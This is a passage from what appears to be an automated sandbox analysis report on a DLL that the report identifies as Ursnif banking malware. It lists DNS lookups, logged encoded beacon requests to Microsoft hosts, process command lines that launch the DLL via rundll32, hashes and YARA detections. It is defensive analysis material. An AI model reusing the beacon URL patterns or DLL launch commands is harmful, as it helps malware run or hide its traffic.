                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)FRA-efz.ms-acdc.office.com40.101.60.226A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)FRA-efz.ms-acdc.office.com52.97.162.2A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)FRA-efz.ms-acdc.office.com40.101.61.130A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:11.024405956 CEST8.8.8.8192.168.2.30x2b8bName error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:14.995378017 CEST8.8.8.8192.168.2.30x66e7Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:31.065346956 CEST8.8.8.8192.168.2.30xdc09No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:35.039261103 CEST8.8.8.8192.168.2.30x9ff6No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • msn.com
                                                                                      • outlook.com
                                                                                      • www.outlook.com
                                                                                      • outlook.office365.com

                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.34975413.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2021-10-11 22:37:08 UTC0OUTGET /mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjjTuSnP5G5SL6XFKB/ya3reo77Dd0XJ5txbLh/Z2Jzwc_2FxPLynamqWy_2B/SzxjiUxPyCdZ8/5vaLjUU_/2FbRmdxDVJSYut_2BRUXs8y/S.jre HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                      Host: msn.com
                                                                                      2021-10-11 22:37:08 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Location: https://www.msn.com/mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjjTuSnP5G5SL6XFKB/ya3reo77Dd0XJ5txbLh/Z2Jzwc_2FxPLynamqWy_2B/SzxjiUxPyCdZ8/5vaLjUU_/2FbRmdxDVJSYut_2BRUXs8y/S.jre
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      X-Powered-By: ASP.NET
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Date: Mon, 11 Oct 2021 22:37:08 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 383
                                                                                      2021-10-11 22:37:08 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 38 38 31 4b 65 42 68 69 6b 33 38 2f 6e 34 49 33 6a 69 73 51 72 73 4c 66 33 4e 2f 35 54 37 57 57 30 54 56 79 71 4c 69 45 71 72 59 70 69 6f 58 77 2f 67 73 42 59 5f 32 42 30 61 75 59 44 51 7a 71 79 2f 66 71 5f 32 42 30 5f 32 42 31 64 35 73 31 58 2f 64 45 38 55 5f 32 42 69 39 65 31 75 48 45 61 5f 32 46 2f 35 67 62 51 4f 41 37 31 6a 2f 34 53 47 6a 6a
                                                                                      Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjj


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.34975613.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2021-10-11 22:37:10 UTC1OUTGET /mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaXfNl4zUpH/oAvtXyz6Z7BEsY_2FVEEFG/s2tbS3iXa95no/TNlgDymJ/mAsry_2BV2k9xkYk3dzUg9O/zullnql4G3/M32YonxJQXyLafjIm/_2FKjkdabgYHJ/uSKzerPj.jre HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                      Host: msn.com
                                                                                      2021-10-11 22:37:10 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Location: https://www.msn.com/mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaXfNl4zUpH/oAvtXyz6Z7BEsY_2FVEEFG/s2tbS3iXa95no/TNlgDymJ/mAsry_2BV2k9xkYk3dzUg9O/zullnql4G3/M32YonxJQXyLafjIm/_2FKjkdabgYHJ/uSKzerPj.jre
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      X-Powered-By: ASP.NET
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Date: Mon, 11 Oct 2021 22:37:10 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 406
                                                                                      2021-10-11 22:37:10 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 49 32 76 79 43 77 51 5a 5f 32 42 5a 64 4f 77 37 5f 32 46 43 35 2f 51 48 71 59 79 4e 73 38 6e 54 6a 41 31 72 37 77 2f 4e 36 55 6b 53 7a 46 47 6b 48 30 66 5f 32 46 2f 31 49 51 68 5f 32 42 7a 32 34 62 6e 6d 4d 63 5a 34 5f 2f 32 42 70 57 70 67 4b 36 61 2f 4d 66 59 58 64 52 33 73 70 34 44 59 4c 61 33 64 31 7a 64 31 2f 71 5f 32 42 65 73 52 6c 6b 61 58
                                                                                      Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaX


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.34978440.97.153.146443C:\Windows\System32\loaddll32.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2021-10-11 22:37:50 UTC2OUTGET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                      Host: outlook.com
                                                                                      2021-10-11 22:37:50 UTC3INHTTP/1.1 301 Moved Permanently
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Location: https://www.outlook.com/signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre
                                                                                      Server: Microsoft-IIS/10.0
                                                                                      request-id: 5b359089-5bcb-778b-068a-f71f7fea54b7
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      X-FEServer: BN6PR2001CA0010
                                                                                      X-RequestId: 2de1b3ec-5903-416c-884b-1bb5ba991823
                                                                                      MS-CV: iZA1W8tbi3cGivcff+pUtw.0
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-FEServer: BN6PR2001CA0010
                                                                                      Date: Mon, 11 Oct 2021 22:37:49 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.34978552.97.223.66443C:\Windows\System32\loaddll32.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2021-10-11 22:37:50 UTC3OUTGET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                      Host: www.outlook.com
                                                                                      2021-10-11 22:37:50 UTC4INHTTP/1.1 301 Moved Permanently
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Location: https://outlook.office365.com/signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre
                                                                                      Server: Microsoft-IIS/10.0
                                                                                      request-id: c3fa3534-2a41-defd-77a3-b7d5d429dca3
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      X-FEServer: AS8PR04CA0135
                                                                                      X-RequestId: 54b63e23-b4ac-4253-abee-fb10f42b5290
                                                                                      MS-CV: NDX6w0Eq/d53o7fV1Cncow.0
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-FEServer: AS8PR04CA0135
                                                                                      Date: Mon, 11 Oct 2021 22:37:49 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.34978652.97.151.2443C:\Windows\System32\loaddll32.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2021-10-11 22:37:50 UTC5OUTGET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                      Host: outlook.office365.com
                                                                                      2021-10-11 22:37:50 UTC5INHTTP/1.1 404 Not Found
                                                                                      Content-Length: 1245
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/10.0
                                                                                      request-id: 6f408bdb-1e4d-c6ec-fa40-6761089e1892
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      X-CalculatedFETarget: DB9PR05CU001.internal.outlook.com
                                                                                      X-BackEndHttpStatus: 404
                                                                                      X-FEProxyInfo: DB9PR05CA0008.EURPRD05.PROD.OUTLOOK.COM
                                                                                      X-CalculatedBETarget: DB8P195MB0662.EURP195.PROD.OUTLOOK.COM
                                                                                      X-BackEndHttpStatus: 404
                                                                                      X-RUM-Validated: 1
                                                                                      X-Proxy-RoutingCorrectness: 1
                                                                                      X-Proxy-BackendServerStatus: 404
                                                                                      MS-CV: 24tAb00e7Mb6QGdhCJ4Ykg.1.1
                                                                                      X-FEServer: DB9PR05CA0008
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-FEServer: AM6P195CA0054
                                                                                      Date: Mon, 11 Oct 2021 22:37:50 GMT
                                                                                      Connection: close
                                                                                      2021-10-11 22:37:50 UTC6INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.34978740.97.153.146443C:\Windows\System32\loaddll32.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2021-10-11 22:37:54 UTC7OUTGET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                      Host: outlook.com
                                                                                      2021-10-11 22:37:54 UTC7INHTTP/1.1 301 Moved Permanently
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Location: https://www.outlook.com/signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre
                                                                                      Server: Microsoft-IIS/10.0
                                                                                      request-id: 1c02960a-5ced-da3d-b337-630db25d6655
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      X-FEServer: BN6PR2001CA0016
                                                                                      X-RequestId: 39c1572a-5c8b-45d3-91d9-fe16156d0cde
                                                                                      MS-CV: CpYCHO1cPdqzN2MNsl1mVQ.0
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-FEServer: BN6PR2001CA0016
                                                                                      Date: Mon, 11 Oct 2021 22:37:54 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.2.34978852.97.135.82443C:\Windows\SysWOW64\rundll32.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2021-10-11 22:37:54 UTC8OUTGET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                      Host: www.outlook.com
                                                                                      2021-10-11 22:37:54 UTC8INHTTP/1.1 301 Moved Permanently
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Location: https://outlook.office365.com/signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre
                                                                                      Server: Microsoft-IIS/10.0
                                                                                      request-id: b55e2ee9-77cf-8398-8a20-712ba510b8df
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      X-FEServer: AS9PR06CA0316
                                                                                      X-RequestId: f805bbde-3773-4bdb-acdb-50b7012df842
                                                                                      MS-CV: 6S5etc93mIOKIHErpRC43w.0
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-FEServer: AS9PR06CA0316
                                                                                      Date: Mon, 11 Oct 2021 22:37:53 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.2.34978940.101.60.226443C:\Windows\SysWOW64\rundll32.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2021-10-11 22:37:54 UTC9OUTGET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                      Host: outlook.office365.com
                                                                                      2021-10-11 22:37:54 UTC10INHTTP/1.1 404 Not Found
                                                                                      Content-Length: 1245
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/10.0
                                                                                      request-id: 0ad922d7-711b-417c-0004-37a25225c4ea
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      X-CalculatedFETarget: DU2PR04CU012.internal.outlook.com
                                                                                      X-BackEndHttpStatus: 404
                                                                                      X-FEProxyInfo: DU2PR04CA0336.EURPRD04.PROD.OUTLOOK.COM
                                                                                      X-CalculatedBETarget: DB7P194MB0346.EURP194.PROD.OUTLOOK.COM
                                                                                      X-BackEndHttpStatus: 404
                                                                                      X-RUM-Validated: 1
                                                                                      X-Proxy-RoutingCorrectness: 1
                                                                                      X-Proxy-BackendServerStatus: 404
                                                                                      MS-CV: 1yLZChtxfEEABDeiUiXE6g.1.1
                                                                                      X-FEServer: DU2PR04CA0336
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-FEServer: AM5P194CA0019
                                                                                      Date: Mon, 11 Oct 2021 22:37:54 GMT
                                                                                      Connection: close
                                                                                      2021-10-11 22:37:54 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: loaddll32.exe PID: 6316 Parent PID: 5636

                                                                                      General

                                                                                      Start time:00:36:08
                                                                                      Start date:12/10/2021
                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll'
                                                                                      Imagebase:0x820000
                                                                                      File size:893440 bytes
                                                                                      MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      Reputation:moderate

                                                                                      Analysis Process: cmd.exe PID: 4524 Parent PID: 6316

                                                                                      General

                                                                                      Start time:00:36:08
                                                                                      Start date:12/10/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                                                                                      Imagebase:0xd80000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: rundll32.exe PID: 4668 Parent PID: 6316

                                                                                      General

                                                                                      Start time:00:36:08
                                                                                      Start date:12/10/2021
                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                                                                                      Imagebase:0x290000
                                                                                      File size:61952 bytes
                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      Analysis Process: rundll32.exe PID: 4536 Parent PID: 4524

                                                                                      General

                                                                                      Start time:00:36:09
                                                                                      Start date:12/10/2021
                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
